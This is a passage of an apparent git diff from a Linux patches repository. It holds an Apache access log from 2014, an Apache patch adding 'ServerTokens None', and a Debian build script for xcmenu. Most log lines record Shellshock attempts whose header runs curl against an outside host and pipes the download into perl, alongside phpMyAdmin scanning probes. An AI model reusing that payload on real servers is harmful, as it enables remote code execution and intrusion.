curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:13 +0200] "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:15 +0200] "GET /cgi-bin/build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:16 +0200] "GET /cgi-bin/bsguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:15 +0200] "GET /cgi-bin/bslist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:18 +0200] "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:18 +0200] "GET /cgi-bin/book.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:19 +0200] "GET /cgi-bin/bnbform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:21 +0200] "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:21 +0200] "GET /cgi-bin/blog/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:24 +0200] "GET /cgi-bin/bigconf.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:22 +0200] "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:27 +0200] "GET /cgi-bin/bb-replog.shHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:25 +0200] "GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:24 +0200] "GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:27 +0200] "GET /cgi-bin/bb-rep.shHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:28 +0200] "GET /cgi-bin/bb-hostsvc.shHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:30 +0200] "GET /cgi-bin/bb-histlog.shHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:30 +0200] "GET /cgi-bin/bb-hist.shHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:33 +0200] "GET /cgi-bin/bannereditor.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:31 +0200] "GET /cgi-bin/bb-ack.shHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:34 +0200] "GET /cgi-bin/badmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:36 +0200] "GET /cgi-bin/axs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:33 +0200] "GET /cgi-bin/banner.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:36 +0200] "GET /cgi-bin/ax.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:37 +0200] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:39 +0200] "GET /cgi-bin/auktion.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:40 +0200] "GET /cgi-bin/AT-generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:39 +0200] "GET /cgi-bin/auction/auction.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:42 +0200] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:42 +0200] "GET /cgi-bin/astrocam.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:45 +0200] "GET /cgi-bin/AnyBoard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:43 +0200] "GET /cgi-bin/architext_query.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:45 +0200] "GET /cgi-bin/alienform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:48 +0200] "GET /cgi-bin/af.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:46 +0200] "GET /cgi-bin/aglimpse.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:48 +0200] "GET /cgi-bin/adminwww.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:51 +0200] "GET /cgi-bin/admin/setup.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:49 +0200] "GET /cgi-bin/adminhot.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:51 +0200] "GET /cgi-bin/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:52 +0200] "GET /cgi-bin/admin.plHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:54 +0200] "GET /cgi-bin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:54 +0200] "GET /cgi-bin/adduser.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:57 +0200] "GET /cgi-bin/add_ftp.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:55 +0200] "GET /cgi-bin/addbanner.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:57 +0200] "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:58 +0200] "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:00 +0200] "GET /cgi-bin/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:00 +0200] "GET /cgi-bin/14all.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:01 +0200] "GET /cgi-bin/14all-1.1.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:03 +0200] "GET /cgi-bin/.namazu.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:03 +0200] "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:06 +0200] "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:04 +0200] "GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:06 +0200] "GET /cgi-bin-sdb/printenvHTTP/1.0" 404 226 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:08:07 +0200] "GET /ccbill/whereami.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:07 +0200] "GET /catalog/index.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:07 +0200] "GET /cartcart.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:08 +0200] "GET /cart.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:08 +0200] "GET /bigconf.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:09 +0200] "GET /bandwidth/index.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:10 +0200] "GET /axis-cgi/buffer/command.cgi HTTP/1.0" 404 465 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:10 +0200] "GET /apps/web/vs_diag.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:11 +0200] "GET /analyse.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:11 +0200] "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:12 +0200] "GET /agora.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:12 +0200] "GET /administrator.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:13 +0200] "GET /admin.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:08:13 +0200] "GET /_mt/mt.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +220.181.108.179 - - [01/Nov/2014:20:28:08 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.100 - - [01/Nov/2014:20:28:13 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.184 - - [01/Nov/2014:21:32:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.103 - - [01/Nov/2014:21:33:32 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.154 - - [01/Nov/2014:22:42:50 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +184.4.62.34 - - [01/Nov/2014:23:00:23 +0200] "GET /ftp/public/other/kmix_no_adjustments.jpg HTTP/1.1" 200 24611 "http://ubuntuforums.org/showthread.php?t=2178849" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36" +184.4.62.34 - - [01/Nov/2014:23:00:23 +0200] "GET /ftp/public/other/alsamixer_no_adjustments.jpg HTTP/1.1" 200 100262 "http://ubuntuforums.org/showthread.php?t=2178849" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36" +212.175.86.222 - - [01/Nov/2014:23:07:11 +0200] "GET /ftft/ftf/ft.php HTTP/1.1" 404 416 "-" "-" +212.175.86.222 - - [01/Nov/2014:23:07:11 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +212.175.86.222 - - [01/Nov/2014:23:07:12 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +212.175.86.222 - - [01/Nov/2014:23:07:12 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +66.249.67.109 - - [01/Nov/2014:23:12:00 +0200] "GET /robots.txt HTTP/1.1" 404 446 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +66.249.67.125 - - [01/Nov/2014:23:12:01 +0200] "GET /ftp/public/pictures/spherical_panoramas/liuskasaari01.html HTTP/1.1" 200 1170 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +123.125.71.91 - - [01/Nov/2014:23:23:04 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.171 - - [01/Nov/2014:23:23:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +173.242.114.117 - - [01/Nov/2014:23:36:16 +0200] "GET /phppath/ HTTP/1.0" 404 409 "-" "-" +173.242.114.117 - - [01/Nov/2014:23:37:32 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "-" "-" +123.125.71.69 - - [02/Nov/2014:01:31:08 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.159 - - [02/Nov/2014:01:31:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +178.239.62.108 - - [02/Nov/2014:01:48:43 +0200] "GET /muieblackcat HTTP/1.1" 404 411 "-" "-" +178.239.62.108 - - [02/Nov/2014:01:48:43 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 421 "-" "-" +178.239.62.108 - - [02/Nov/2014:01:48:44 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 403 424 "-" "-" +178.239.62.108 - - [02/Nov/2014:01:48:44 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 415 "-" "-" +178.239.62.108 - - [02/Nov/2014:01:48:44 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 419 "-" "-" +178.239.62.108 - - [02/Nov/2014:01:48:45 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 419 "-" "-" +123.125.71.78 - - [02/Nov/2014:02:23:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.152 - - [02/Nov/2014:02:24:44 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.176 - - [02/Nov/2014:03:11:23 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.110 - - [02/Nov/2014:03:11:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +219.232.247.108 - - [02/Nov/2014:03:41:37 +0200] "GET /wbwb/wbw/wb.php HTTP/1.1" 404 416 "-" "-" +219.232.247.108 - - [02/Nov/2014:03:41:38 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +219.232.247.108 - - [02/Nov/2014:03:41:38 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +219.232.247.108 - - [02/Nov/2014:03:41:39 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +220.181.108.180 - - [02/Nov/2014:04:10:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.73 - - [02/Nov/2014:04:12:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.186 - - [02/Nov/2014:05:08:38 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.88 - - [02/Nov/2014:05:08:49 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" diff --git a/patches/patch_apache_servertokens.patch b/patches/patch_apache_servertokens.patch new file mode 100644 index 0000000..74510d2 --- /dev/null +++ b/patches/patch_apache_servertokens.patch @@ -0,0 +1,52 @@ +Author: Pekka Helenius (~Fincer), 2018 + +Patch: Implements 'ServerTokens None' to Apache2/httpd Hypertext Transfer Protocol Server +Makes it possible to remove 'Server:' tag from HTTP header + +--- a/server/core.c ++++ b/server/core.c +@@ -3373,7 +3373,8 @@ + SrvTk_MINIMAL, /* eg: Apache/2.0.41 */ + SrvTk_OS, /* eg: Apache/2.0.41 (UNIX) */ + SrvTk_FULL, /* eg: Apache/2.0.41 (UNIX) PHP/4.2.2 FooBar/1.2b */ +- SrvTk_PRODUCT_ONLY /* eg: Apache */ ++ SrvTk_PRODUCT_ONLY, /* eg: Apache */ ++ SrvTk_NONE /* Returns nothing */ + }; + static enum server_token_type ap_server_tokens = SrvTk_FULL; + +@@ -3440,6 +3441,9 @@ + if (ap_server_tokens == SrvTk_PRODUCT_ONLY) { + ap_add_version_component(pconf, AP_SERVER_BASEPRODUCT); + } ++ else if (ap_server_tokens == SrvTk_NONE) { ++ ap_add_version_component(pconf, ""); ++ } + else if (ap_server_tokens == SrvTk_MINIMAL) { + ap_add_version_component(pconf, AP_SERVER_BASEVERSION); + } +@@ -3487,11 +3491,14 @@ + else if (!strcasecmp(arg, "Prod") || !strcasecmp(arg, "ProductOnly")) { + ap_server_tokens = SrvTk_PRODUCT_ONLY; + } ++ else if (!strcasecmp(arg, "None")) { ++ ap_server_tokens = SrvTk_NONE; ++ } + else if (!strcasecmp(arg, "Full")) { + ap_server_tokens = SrvTk_FULL; + } + else { +- return "ServerTokens takes 1 argument: 'Prod(uctOnly)', 'Major', 'Minor', 'Min(imal)', 'OS', or 'Full'"; ++ return "ServerTokens takes 1 argument: 'Prod(uctOnly)', 'Major', 'Minor', 'Min(imal)', 'OS', 'Full' or 'None'"; + } + + return NULL; +@@ -4369,7 +4376,7 @@ + "A numeric IP address:port, or the name of a host"), + AP_INIT_TAKE1("ServerTokens", set_serv_tokens, NULL, RSRC_CONF, + "Determine tokens displayed in the Server: header - Min(imal), " +- "Major, Minor, Prod(uctOnly), OS, or Full"), ++ "Major, Minor, Prod(uctOnly), OS, Full or None"), + AP_INIT_TAKE1("LimitRequestLine", set_limit_req_line, NULL, RSRC_CONF, + "Limit on maximum size of an HTTP request line"), + AP_INIT_TAKE1("LimitRequestFieldsize", set_limit_req_fieldsize, NULL, diff --git a/scripts/compile-xcmenu-screenshot.sh b/scripts/compile-xcmenu-screenshot.sh new file mode 100644 index 0000000..a66ab22 --- /dev/null +++ b/scripts/compile-xcmenu-screenshot.sh @@ -0,0 +1,94 @@ +#!/bin/bash + +###################################################### +# THIS SCRIPT DOWNLOADS AND COMPILES PROGRAM 'xcmenu' IN A DEBIAN SYSTEM +# +# THIS SCRIPT PRESENTS A METHOD OF TAKING A SCREENSHOT ON A LINUX DESKTOP +# IN A SIMILAR WAY THAN ON MICROSOFT WINDOWS. + +############### +# This is a useful method for capturing screenshots on a X11 desktop +# The main idea is to replicate Microsoft Windows behavior of taking screenshots +# without any additional cumbersome client programs which are traditionally used on Linux desktops. +# +# Source code and build instructions (mainly for Arch Linux) of the command 'xclipshow' are available here: +# https://github.com/Fincer/linux-patches-and-scripts/tree/master/xclipshow +# +# The code is originally presented in +# https://unix.stackexchange.com/questions/163081/application-that-allows-to-show-clipboard-contents-and-its-mime-type/163115#163115 +# +############### +# +# 1. Run this script with 'bash compile-xcmenu.sh' +# 2. Verify xcmenu installation by running 'dpkg --get-selections |grep xcmenu' +# 3. You need imagemagick. Install it by running 'sudo apt-get install imagemagick' +# 4. Copy the following command... + +# import -window root -screen /tmp/screen.png | xcmenu -bi image/png < /tmp/screen.png + +# ... and map a new shortcut key for it (such as printscreen key) on your preferred desktop environment. + +# 5. Compile 'xclipshow' by following the instructions given above and in this script below. +# Additionally, You need 'cmake' and 'qt5-default' packages to compile the source code (not sure if other Qt5 packages are also required). +# +# 6. Map another shortcut key (such as Alt+V) for the chosen paint program (kolourpaint in this case). +# Use the following command syntax for pasting shortcut: + +# bash -c "if [[ $(xclipshow |grep -c image/png) -eq 1 ]]; then kolourpaint /tmp/screen.png; fi" + +############### + +# Personally, I have mapped print screen key to capture & save a screenshot, and Alt+V to open it into Kolourpaint on KDE 5 desktop. +# Additionally, I have implemented a GUI nofitication for screenshots. Each time screenshot is saved in /tmp, the desktop reminds me about that. + +###################################################### +# INSTRUCTIONS FOR COMPILING 'xcmenu' FROM SOURCE IN A DEBIAN SYSTEM +###################################################### +# Install necessary dependencies for the program + +sudo apt-get install zlib1g libxcb1 zlib1g-dev libxcb1-dev dh-make git make + +###################################################### +# Go to $HOME, create subfolder 'xcmenu' +# Clone source files from GitHub to $HOME/xcmenu/xcmenu-0.1.0 subfolder +# Access xcmenu-0.1.0 subfolder + +cd && mkdir xcmenu +cd xcmenu && git clone git://github.com/dindon-sournois/xcmenu.git xcmenu-0.1.0 +cd xcmenu-0.1.0 + +###################################################### +# Prepare compiling environment by generating 'debian' folder + contents + +dh_make --createorig -s -y + +###################################################### +# Set build & runtime dependencies + build rule overrides + +# Build time dependencies +sed -i 's/Build-Depends: debhelper (>=9)/Build-Depends: debhelper (>=9), make, zlib1g-dev, libxcb1-dev/g' debian/control + +# Runtime dependencies +sed -i 's/Depends: ${shlibs:Depends}, ${misc:Depends}/Depends: gcc, zlib1g, libxcb1/g' debian/control + +# Program description +sed -i 's//lightweight clipboard manager for X/g' debian/control +sed -i 's/ / ./g' debian/control + +# A build rule override +echo 'override_dh_usrlocal:' | tee -a debian/rules + +###################################################### +# Compile source files into a deb package without signatures + +dpkg-buildpackage -rfakeroot -b -us -uc + +###################################################### +# Install compiled .deb package + +sudo dpkg -i ../xcmenu*.deb + +###################################################### +# Remove build dependencies from the system as they are no longer needed + +sudo apt-get purge --remove zlib1g-dev libxcb1-dev diff --git a/scripts/file-and-dirs-owner.sh 